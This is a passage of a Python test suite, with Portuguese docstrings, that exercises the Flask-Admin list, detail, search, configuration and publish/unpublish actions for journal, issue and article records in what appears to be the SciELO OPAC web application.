'rowid': None, # sem rowid deveria gerar uma exeção
},
follow_redirects=True
)
self.assertStatus(action_response, 200)
self.assertTemplateUsed('admin/model/list.html')
self.assertIn(expected_msg, action_response.data.decode('utf-8'))
journal.reload()
self.assertTrue(journal.is_public)
def test_admin_journal_action_unpublish_default_with_exception_raised_must_be_consistent(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Journal no banco (is_public=True)
Quando:
- fazemos login e
- acessamos a pagina de listagem de periódicos: /admin/journal/
- realizamos a ação de despublicacar (unpublish_default), mas é levantada uma exceção no processo
Verificamos:
- o periódico deve ficar como público (is_public=True)
- o usuario é notificado que houve um erro na operação
"""
# with
journal = makeOneJournal({'is_public': True})
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
journal_index_url = url_for('journal.index_view')
action_url = '%saction/' % journal_index_url
expected_msg = u'Ocorreu um erro tentando despublicar o(s) periódico(s)!!'
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acessamos a listagem de periódicos
journal_list_response = client.get(journal_index_url)
self.assertStatus(journal_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# then
# executamos ação publicar:
with self.assertRaises(Exception):
action_response = client.post(
action_url,
data={
'url': journal_index_url,
'action': 'unpublish_default',
'rowid': None, # sem rowid deveria gerar uma exeção
},
follow_redirects=True
)
self.assertStatus(action_response, 200)
self.assertTemplateUsed('admin/model/list.html')
self.assertIn(expected_msg, action_response.data)
journal.reload()
self.assertTrue(journal.is_public)
class IssueAdminViewTests(BaseTestCase):
def test_admin_issue_list_records(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Issue no banco
Quando:
- fazemos login e
- acessamos a pagina /admin/issue/
Verificamos:
- o Issue criado deve esta listado nessa página
"""
# with
issue = makeOneIssue()
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
self.assertTemplateUsed('admin/index.html')
self.assertTrue(current_user.is_authenticated)
# acesso a aba de números
issue_list_response = client.get(url_for('issue.index_view'))
self.assertStatus(issue_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# then
# verificamos a resposta
# que tem a id para acessar ao números
self.assertIn(issue.id, issue_list_response.data.decode('utf-8'))
def test_admin_issue_details(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Issue no banco
Quando:
- fazemos login e
- acessamos a pagina de detalhe do issue: /admin/issue/details/
Verificamos:
- a pagina mostra o issue certo
"""
# with
issue = makeOneIssue()
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
issue_detail_url = url_for('issue.details_view', id=issue.id)
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
self.assertTemplateUsed('admin/index.html')
self.assertTrue(current_user.is_authenticated)
# acesso a aba de periódicos
issue_detail_response = client.get(issue_detail_url)
self.assertStatus(issue_detail_response, 200)
self.assertTemplateUsed('admin/model/details.html')
# then
# verificamos a resposta
# que tem a id para acessar ao números
self.assertIn(issue.id, issue_detail_response.data.decode('utf-8'))
def test_admin_issue_search_by_id(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Issue no banco
Quando:
- fazemos login e
- acessamos a pagina de detalhe do issue: /admin/issue/details/
- realizamos uma busca pelo id do issue
Verificamos:
- a página mostra o issue certo
"""
# with
issue = makeOneIssue()
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
issue_index_url = url_for('issue.index_view')
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de issues
issue_list_response = client.get(issue_index_url)
self.assertStatus(issue_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
issue_search_response = client.get(issue_index_url, data={'search': issue.id})
self.assertStatus(issue_search_response, 200)
# que tem a id para acessar ao periódico
self.assertIn(issue.id, issue_list_response.data.decode('utf-8'))
def test_admin_issue_check_column_filters(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de issue: /admin/issue/
Verificamos:
- que contém todos os column_filters esperados
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
issue_index_url = url_for('issue.index_view')
expected_col_filters = [
'journal',
'volume',
'number',
'type',
'start_month',
'end_month',
'year',
'is_public',
'unpublish_reason',
]
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
issue_list_response = client.get(issue_index_url)
self.assertStatus(issue_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
column_filters = self.get_context_variable('admin_view').column_filters
self.assertEqual(len(expected_col_filters), len(column_filters))
for expected_col_filter in expected_col_filters:
self.assertIn(expected_col_filter, column_filters)
def test_admin_issue_check_searchable_columns(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de issues: /admin/issue/
Verificamos:
- que contém todos os campos de busca esperados
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
issue_index_url = url_for('issue.index_view')
expected_column_searchable_list = [
'iid', 'journal', 'volume', 'number',
'label'
]
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
issue_list_response = client.get(issue_index_url)
self.assertStatus(issue_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
column_searchable_list = self.get_context_variable('admin_view').column_searchable_list
for expected_searchable_field in expected_column_searchable_list:
self.assertIn(expected_searchable_field, column_searchable_list)
def test_admin_issue_check_column_exclude_list(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de issues: /admin/issue/
Verificamos:
- que contém todos os campos excluidos da listagem são os esperados
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
issue_index_url = url_for('issue.index_view')
expected_column_exclude_list = [
'_id', 'sections', 'cover_url', 'suppl_text',
'spe_text', 'start_month', 'end_month', 'order', 'label', 'order',
'unpublish_reason'
]
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
issue_list_response = client.get(issue_index_url)
self.assertStatus(issue_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
column_exclude_list = self.get_context_variable('admin_view').column_exclude_list
for expected_excluded_field in expected_column_exclude_list:
self.assertIn(expected_excluded_field, column_exclude_list)
def test_admin_issue_check_column_formatters(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de issues: /admin/issue/
Verificamos:
- que contém todos os formatadores de campos como são os esperados
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
issue_index_url = url_for('issue.index_view')
expected_column_formatters = [
'created',
'updated',
]
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
issue_list_response = client.get(issue_index_url)
self.assertStatus(issue_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
column_formatters = self.get_context_variable('admin_view').column_formatters
for expected_column_formatter in expected_column_formatters:
self.assertIn(expected_column_formatter, column_formatters.keys())
def test_admin_issue_check_column_labels_defined(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de issues: /admin/issue/
Verificamos:
- que contém todas as etiquetas de campos esperadas
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
issue_index_url = url_for('issue.index_view')
expected_column_labels = [
'iid',
'journal',
'sections',
'cover_url',
'volume',
'number',
'created',
'updated',
'type',
'suppl_text',
'spe_text',
'start_month',
'end_month',
'year',
'label',
'order',
'is_public',
'unpublish_reason',
]
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
issue_list_response = client.get(issue_index_url)
self.assertStatus(issue_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
column_labels = self.get_context_variable('admin_view').column_labels
for expected_column_label in expected_column_labels:
self.assertIn(expected_column_label, column_labels.keys())
def test_admin_issue_check_can_create_is_false(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de periódicos: /admin/issue/
Verificamos:
- que não permite criar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
issue_index_url = url_for('issue.index_view')
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
issue_list_response = client.get(issue_index_url)
self.assertStatus(issue_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
can_create = self.get_context_variable('admin_view').can_create
self.assertFalse(can_create)
def test_admin_issue_check_can_edit_is_false(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de Issues: /admin/issue/
Verificamos:
- que não permite editar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
issue_index_url = url_for('issue.index_view')
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
issue_list_response = client.get(issue_index_url)
self.assertStatus(issue_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
can_edit = self.get_context_variable('admin_view').can_edit
self.assertFalse(can_edit)
def test_admin_issue_check_can_delete_is_false(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de issues: /admin/issue/
Verificamos:
- que não permite apagar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
issue_index_url = url_for('issue.index_view')
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
issue_list_response = client.get(issue_index_url)
self.assertStatus(issue_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
can_delete = self.get_context_variable('admin_view').can_delete
self.assertFalse(can_delete)
def test_admin_issue_check_create_modal_is_true(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de periódicos: /admin/issue/
Verificamos:
- que não permite editar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
issue_index_url = url_for('issue.index_view')
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
issue_list_response = client.get(issue_index_url)
self.assertStatus(issue_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
create_modal = self.get_context_variable('admin_view').create_modal
self.assertTrue(create_modal)
def test_admin_issue_check_edit_modal_is_true(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de periódicos: /admin/issue/
Verificamos:
- que não permite editar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
issue_index_url = url_for('issue.index_view')
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
issue_list_response = client.get(issue_index_url)
self.assertStatus(issue_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
edit_modal = self.get_context_variable('admin_view').edit_modal
self.assertTrue(edit_modal)
def test_admin_issue_check_can_view_details_is_true(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de issues: /admin/issue/
Verificamos:
- que não permite editar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
issue_index_url = url_for('issue.index_view')
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
issue_list_response = client.get(issue_index_url)
self.assertStatus(issue_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
can_view_details = self.get_context_variable('admin_view').can_view_details
self.assertTrue(can_view_details)
def test_admin_issue_check_actions_defined(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de issues: /admin/issue/
Verificamos:
- que contém todas as etiquetas de campos esperadas
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
issue_index_url = url_for('issue.index_view')
expected_actions = [
'publish',
'unpublish_default',
]
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
issue_list_response = client.get(issue_index_url)
self.assertStatus(issue_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
actions = [a[0] for a in self.get_context_variable('actions')]
self.assertEqual(len(expected_actions), len(actions))
for expected_action in expected_actions:
self.assertIn(expected_action, actions)
def test_admin_issue_action_publishing_an_unpublished_issue(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Issue no banco (is_public=False)
Quando:
- fazemos login e
- acessamos a pagina de listagem de Issue: /admin/issue/
- realizamos a ação de pubilcar
Verificamos:
- o Issue deve ficar como público
- o usuario é notificado do resultado da operação
"""
# with
issue = makeOneIssue({'is_public': False})
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
issue_index_url = url_for('issue.index_view')
publish_action_url = '%saction/' % issue_index_url
expected_msg = u'Número(s) publicado(s) com sucesso!!'
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acessamos a listagem de periódicos
issue_list_response = client.get(issue_index_url)
self.assertStatus(issue_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# executamos ação publicar:
action_response = client.post(
publish_action_url,
data={
'url': issue_index_url,
'action': 'publish',
'rowid': issue.id,
},
follow_redirects=True
)
self.assertStatus(action_response, 200)
self.assertTemplateUsed('admin/model/list.html')
self.assertIn(expected_msg, action_response.data.decode('utf-8'))
issue.reload()
self.assertTrue(issue.is_public)
def test_admin_issue_action_publishing_a_public_issue(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Issue no banco (is_public=True)
Quando:
- fazemos login e
- acessamos a pagina de listagem de issues: /admin/issue/
- realizamos a ação de pubilcar
Verificamos:
- o issue deve ficar como público
- o usuario é notificado do resultado da operação
"""
# with
issue = makeOneIssue({'is_public': True})
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
issue_index_url = url_for('issue.index_view')
action_url = '%saction/' % issue_index_url
expected_msg = u'Número(s) publicado(s) com sucesso!!'
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acessamos a listagem de periódicos
issue_list_response = client.get(issue_index_url)
self.assertStatus(issue_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# then
# executamos ação publicar:
action_response = client.post(
action_url,
data={
'url': issue_index_url,
'action': 'publish',
'rowid': issue.id,
},
follow_redirects=True
)
self.assertStatus(action_response, 200)
self.assertTemplateUsed('admin/model/list.html')
self.assertIn(expected_msg, action_response.data.decode('utf-8'))
issue.reload()
self.assertTrue(issue.is_public)
def test_admin_issue_action_unpublish_default_a_public_issue(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Issue no banco (is_public=True)
Quando:
- fazemos login e
- acessamos a pagina de listagem de issues: /admin/issue/
- realizamos a ação de despublicar (unpublish_default)
Verificamos:
- o issue deve ficar despublicado
- o motivo de despublicação deve ser por: 'Conteúdo temporariamente indisponível'
- o usuario é notificado do resultado da operação
"""
# with
issue = makeOneIssue({'is_public': True})
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
issue_index_url = url_for('issue.index_view')
action_url = '%saction/' % issue_index_url
expected_msg = 'Número(s) despublicado(s) com sucesso!!'
expected_reason = 'Conteúdo temporariamente indisponível'
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acessamos a listagem de periódicos
issue_list_response = client.get(issue_index_url)
self.assertStatus(issue_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# then
# executamos ação publicar:
action_response = client.post(
action_url,
data={
'url': issue_index_url,
'action': 'unpublish_default',
'rowid': issue.id,
},
follow_redirects=True
)
self.assertStatus(action_response, 200)
self.assertTemplateUsed('admin/model/list.html')
self.assertIn(expected_msg, action_response.data.decode('utf-8'))
issue.reload()
self.assertFalse(issue.is_public)
self.assertEqual(expected_reason, issue.unpublish_reason)
def test_admin_issue_action_publish_with_exception_raised_must_be_consistent(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Issue no banco (is_public=False)
Quando:
- fazemos login e
- acessamos a pagina de listagem de Issues: /admin/issue/
- realizamos a ação de publicacar, mas é levantada uma exceção no processo
Verificamos:
- o Issue deve ficar como não público (is_public=False)
- o usuario é notificado que houve um erro na operação
"""
# with
issue = makeOneIssue({'is_public': False})
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
issue_index_url = url_for('issue.index_view')
action_url = '%saction/' % issue_index_url
expected_msg = u'Ocorreu um erro tentando despublicar o(s) número(s)!!.'
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acessamos a listagem de periódicos
issue_list_response = client.get(issue_index_url)
self.assertStatus(issue_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# then
# executamos ação publicar:
with self.assertRaises(Exception):
action_response = client.post(
action_url,
data={
'url': issue_index_url,
'action': 'publish',
'rowid': None, # sem rowid deveria gerar uma exeção
},
follow_redirects=True
)
self.assertStatus(action_response, 200)
self.assertTemplateUsed('admin/model/list.html')
self.assertIn(expected_msg, action_response.data.decode('utf-8'))
issue.reload()
self.assertTrue(issue.is_public)
def test_admin_issue_action_unpublish_default_with_exception_raised_must_be_consistent(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Issue no banco (is_public=True)
Quando:
- fazemos login e
- acessamos a pagina de listagem de Issues: /admin/issue/
- realizamos a ação de despublicacar (unpublish_default), mas é levantada uma exceção no processo
Verificamos:
- o issue deve ficar como público (is_public=True)
- o usuario é notificado que houve um erro na operação
"""
# with
issue = makeOneIssue({'is_public': True})
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
issue_index_url = url_for('issue.index_view')
action_url = '%saction/' % issue_index_url
expected_msg = u'Ocorreu um erro tentando despublicar o(s) número(s)!!.'
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acessamos a listagem de Issues
issue_list_response = client.get(issue_index_url)
self.assertStatus(issue_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# then
# executamos ação publicar:
with self.assertRaises(Exception):
action_response = client.post(
action_url,
data={
'url': issue_index_url,
'action': 'unpublish_default',
'rowid': None, # sem rowid deveria gerar uma exeção
},
follow_redirects=True
)
self.assertStatus(action_response, 200)
self.assertTemplateUsed('admin/model/list.html')
self.assertIn(expected_msg, action_response.data)
issue.reload()
self.assertTrue(issue.is_public)
class ArticleAdminViewTests(BaseTestCase):
def test_admin_article_list_records(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Article no banco
Quando:
- fazemos login e
- acessamos a pagina /admin/article/
Verificamos:
- o Article criado deve esta listado nessa página
"""
# with
article = makeOneArticle({'title': u'foo bar baz'})
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
self.assertTemplateUsed('admin/index.html')
self.assertTrue(current_user.is_authenticated)
# acesso a aba de números
article_list_response = client.get(url_for('article.index_view'))
self.assertStatus(article_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# then
# verificamos a resposta
# que tem a id para acessar ao número
self.assertIn(article.id, article_list_response.data.decode('utf-8'))
def test_admin_article_details(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Article no banco
Quando:
- fazemos login e
- acessamos a pagina de detalhe do article: /admin/article/details/
Verificamos:
- a pagina mostra o article certo
"""
# with
article = makeOneArticle()
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
article_detail_url = url_for('article.details_view', id=article.id)
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
self.assertTemplateUsed('admin/index.html')
self.assertTrue(current_user.is_authenticated)
# acesso a aba de periódicos
article_detail_response = client.get(article_detail_url)
self.assertStatus(article_detail_response, 200)
self.assertTemplateUsed('admin/model/details.html')
# then
# verificamos a resposta
# que tem a id para acessar ao número
self.assertIn(article.id, article_detail_response.data.decode('utf-8'))
def test_admin_article_search_by_id(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Article no banco
Quando:
- fazemos login e
- acessamos a pagina de detalhe do article: /admin/article/details/
- realizamos uma busca pelo id do article
Verificamos:
- a página mostra o article certo
"""
# with
article = makeOneArticle()
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
article_index_url = url_for('article.index_view')
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de articles
article_list_response = client.get(article_index_url)
self.assertStatus(article_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
article_search_response = client.get(article_index_url, data={'search': article.id})
self.assertStatus(article_search_response, 200)
# que tem a id para acessar ao periódico
self.assertIn(article.id, article_list_response.data.decode('utf-8'))
def test_admin_article_check_column_filters(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de Article: /admin/article/
Verificamos:
- que contém todos os column_filters esperados
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
article_index_url = url_for('article.index_view')
expected_col_filters = [
'issue', 'journal', 'is_aop', 'is_public', 'unpublish_reason'
]
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
article_list_response = client.get(article_index_url)
self.assertStatus(article_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
column_filters = self.get_context_variable('admin_view').column_filters
self.assertEqual(len(expected_col_filters), len(column_filters))
for expected_col_filter in expected_col_filters:
self.assertIn(expected_col_filter, column_filters)
def test_admin_article_check_searchable_columns(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de articles: /admin/article/
Verificamos:
- que contém todos os campos de busca esperados
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
article_index_url = url_for('article.index_view')
expected_column_searchable_list = [
'aid', 'issue', 'journal', 'title', 'domain_key'
]
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
article_list_response = client.get(article_index_url)
self.assertStatus(article_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
column_searchable_list = self.get_context_variable('admin_view').column_searchable_list
self.assertEqual(len(expected_column_searchable_list), len(column_searchable_list))
for expected_searchable_field in expected_column_searchable_list:
self.assertIn(expected_searchable_field, column_searchable_list)
def test_admin_article_check_column_exclude_list(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de articles: /admin/article/
Verificamos:
- que contém todos os campos excluidos da listagem são os esperados
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
article_index_url = url_for('article.index_view')
expected_column_exclude_list = [
'_id', 'aid', 'section', 'is_aop', 'htmls', 'domain_key', 'xml',
'unpublish_reason', 'translated_titles', 'sections', 'pdfs', 'languages',
'original_language', 'created', 'abstract', 'authors', 'order',
'abstract_languages', 'elocation', 'fpage', 'lpage', 'url_segment'
]
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
article_list_response = client.get(article_index_url)
self.assertStatus(article_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
column_exclude_list = self.get_context_variable('admin_view').column_exclude_list
self.assertEqual(len(expected_column_exclude_list), len(column_exclude_list))
for expected_excluded_field in expected_column_exclude_list:
self.assertIn(expected_excluded_field, column_exclude_list)
def test_admin_article_check_column_formatters(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de articles: /admin/article/
Verificamos:
- que contém todos os formatadores de campos como são os esperados
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
article_index_url = url_for('article.index_view')
expected_column_formatters = [
'created',
'updated',
]
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
article_list_response = client.get(article_index_url)
self.assertStatus(article_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
column_formatters = self.get_context_variable('admin_view').column_formatters
self.assertEqual(len(expected_column_formatters), len(column_formatters))
for expected_column_formatter in expected_column_formatters:
self.assertIn(expected_column_formatter, column_formatters.keys())
def test_admin_article_check_column_labels_defined(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de Article: /admin/article/
Verificamos:
- que contém todas as etiquetas de campos esperadas
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
article_index_url = url_for('article.index_view')
expected_column_labels = [
'aid',
'issue',
'journal',
'title',
'section',
'is_aop',
'created',
'updated',
'htmls',
'domain_key',
'is_public',
'unpublish_reason',
'url_segment',
'pid',
'original_language',
'translated_titles',
